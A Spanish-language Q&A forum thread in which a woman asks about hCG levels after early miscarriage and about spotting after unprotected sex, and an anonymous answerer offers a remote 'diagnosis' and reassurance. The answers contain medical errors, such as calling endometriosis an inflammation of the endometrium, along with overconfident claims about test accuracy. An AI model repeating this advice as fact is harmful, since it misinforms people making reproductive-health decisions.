Qué resultado daría un test de embarazo después de un aborto espontáneo

Otra vez, me estuviste informando ayer sobre los test de embarazo. Mientras espero a poder hacerlo le estoy dando demasiadas vueltas a la cabeza, por ejemplo se me plantea esta duda: si se produce la implantación, pero poco después se produce un aborto espontáneo, ¿los niveles en sangre seguirían marcando embarazo unas 24 horas después del aborto, por ejemplo, o ya no? Muchas gracias por la información, espero quitarme pronto los nervios una vez que haga el test

<script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.dataLoaded"></script><script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.dataLoaded"></script>

1 respuesta

Respuesta
1

Depende de como ha sido el aborto, si este ha sido totalmente limpio y no queda restos de la gestación, sale negativo, pero si ha quedado algo de HCG, lógicamente te sale positivo. Tras un aborto, si aún sale positivo, tienes que hacer la prueba de sangre cada semana, y si los valores desciende es que no estás embarazada, en cambio si se mantiene los mismos valores, debería de ir al ginecólogo, para que te haga un legrado, ya que te queda algo en el útero y por último si aumenta, es que estás en gestación.

Pero estate tranquila, ese flujo parece de ovulación, y no creo que lo estés.

Hola de nuevo!

En el centro al que he acudido solo tenían test de embarazo de orina, me dijeron que eran de un tipo que 10 días después de la relación de riesgo ya valían , yo he ido 12 días después de la relación y me ha dado negativo, lo que pasa es que me dijeron que si no me quedaba tranquila volviese más adelante o si no me venía la regla. Si sigo preocupada a lo mejor voy a otro sitio donde tengan de sangre. Hasta ahí bien, pero en el flujo que yo creo que era de ovulación he notado un poquito de sangre, muy poca, normal, color rojo. No le di importancia porque a veces me pasa que cuando estoy muy nerviosa me sale sangre durante la ovulación, el mes pasado también me pasó, y más veces antes, pero ahora estuve leyendo cosas y estoy muy nerviosa pensando que pueda ser sangrado de implantación. Aunque para eso creo que sería algo pronto, y además, mi sangre es roja normal, no es marrón ni rosa, y es sangre que parece fresca. Esa sangre la noté el pasado sábado (6 días después de la relación de riesgo), luego domingo no, luego lunes y martes sí, y hoy viernes otra vez. No es casi nada, solo unas gotitas, y todo lo otro es flujo. Yo pienso que pudo ser durante la ovulación y que me quedaron algunos restos de sangre que sigo expulsando. Cuando tuve la última relación tenía la regla, que me vino retrasada este mes, también pienso que tal vez sean restos de regla, o de alguna herida durante la penetración, aunque yo creo que es lo que me pasa a veces durante la ovulación, y hay que tener en cuenta que podría ser algo provocado por el estrés o el nerviosismo porque estoy pasando unas semanas de muchos nervios¿Por las descripciones que he dado es probable que sea consecuencia de la ovulación, o podría ser sangrado de implantación, o incluso la regla adelantada aunque no sea nada abundante? (falta aproximadamente una semana para que me tenga que venir la regla).

Muchísimas gracias, un saludo

<script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.dataLoaded"></script><script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.dataLoaded"></script>

Vale, cuando mantuviste esa relación sexual con riesgo, seguías con la regla, ¿es cierto lo que he leído? De ser así, es normal que sangres así de poquito, ya que te queda restos menstruales. La sangre menstrual se corta durante la relación sexual, por la excitación, una vez que termine el acto, al cabo de un día o así, si te queda restos de la regla, desechas el remanente.

Sobre los sangrados de ovulación, son normales, ya que los niveles de estrógenos se baja, y es normal que tengas leves sangrados durante 1-2 días. Si sangras de forma abundante, puede ser una endometriosis (inflamación del endometrio), por lo que tendrías que acudir al ginecólogo de urgencias.

Sobre el embarazo, casi seguro está descartado, ya que las pruebas ambulatorias son mucho más precisas que la de farmacia, no tiene dan tantos falsos negativos, de todas maneras, puedes hacerte ya la de sangre, por tu salud mental, ya que esta es totalmente fiable, y si es negativo, ya puedes olvidar de una gestación, porque se descarta.

También ese sangrado, puede ser debido a una lesión vaginal, producida por la fricción tras la relación sexual, por lo que te recomiendo, si ese sangrado persiste, es que cojas cita para el ginecólogo para determinar si tienes esa herida o cualquier otra cosa a nivel vaginal. También te asesoro que te hagas exámenes de ecografía vaginal, para realizarte exámenes a nivel uterino, matriz, trompas de falopio, ovarios..., si tienes relaciones sexuales, debes de tener un control ginecológico anual.

Bajo mi punto de vista y diagnóstico a distancia, a nivel subjetivo, ese sangrado es por restos menstruales, más lesión por fricción y posible ovulación, esta no se puede determinar si no se realiza un test, pero yo no creo que sea un embarazo, pero hazte la de sangre cuando quieras, para descartarlo.

y por cierto, medicamentos solo tomé ibuprofeno 2 veces en esta semana, lo comento por si puede influir

No, esa medicación no es un anticoagulante, por lo tanto eso no interfiere, me mantengo en el anterior diagnóstico, pero se necesita pruebas objetivas.

De acuerdo. Cuando tuve la relación de riesgo sí que tenía la regla así que supongo que es eso, de todas formas iré al ginecólogo para saber más exactamente si hay una lesión o enfermedad. Con respecto al test de embarazo ya me quedo muchísimo más tranquila.

Muchísimas gracias por la información, un saludo.

Añade tu respuesta

Haz clic para o

Más respuestas relacionadas